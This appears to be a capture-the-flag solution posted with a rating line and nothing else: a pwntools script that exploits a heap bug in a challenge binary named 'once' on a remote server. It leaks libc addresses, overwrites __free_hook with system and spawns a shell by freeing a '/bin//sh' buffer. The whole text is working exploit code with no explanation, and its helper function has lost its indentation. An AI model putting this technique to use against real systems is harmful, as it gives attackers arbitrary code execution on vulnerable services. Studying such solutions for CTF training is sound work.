Rating: 0

```
from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

#p = process('./once')
p = remote("47.75.189.102", 9999)
b = ELF('./once')
l = ELF('libc-2.23.so')

"""
gdb.attach(p, '''
boff 0xf88
tracemalloc on
''')
"""

def create():
p.send("1\x00")
return p.recvuntil("> ")

#puts addr
p.recvuntil("> ")
p.sendline("10")
puts = p.recvuntil("> ").split('\n')[1].replace('> ', '')
puts = int(puts, 0)
log.info("puts @: " + hex(puts))
libcbase = puts - l.symbols['puts']
free_hook = libcbase + l.symbols['__free_hook']
log.info("__free_hook @: " + hex(free_hook))
system = libcbase + l.symbols['system']
binsh = libcbase + 0x18cd57
log.info("system @: " + hex(system))
stdout = libcbase + l.symbols['_IO_2_1_stdout_']
stdin = libcbase + l.symbols['_IO_2_1_stdin_']

p.sendline("4")
p.recvuntil("> ")
p.sendline("1")
p.recvuntil("input size:\n")
p.sendline("232")
p.recvuntil("> ")
p.sendline("4")
p.recvuntil("> ")

create()

p.send("2" + "\x00"*7)
p.send(p64(0)*3 + "\x58")
p.recvuntil("> ")

p.sendline("3" + "\x00"*3)
p.recvuntil("> ")

p.sendline("4")
p.recvuntil("> ")
p.sendline("2")
p.send("/bin//sh" + p64(0)*2 + p64(free_hook) + p64(stdout) + p64(0) + p64(stdin) + p64(0)*2)
p.recvuntil("> ")

p.sendline("4")
p.recvuntil("> ")
p.send("2" + "\x00"*7)
p.sendline(p64(system))
p.recvuntil("> ")

p.sendline("4")
p.recvuntil("> ")
p.sendline("3")

p.interactive()

```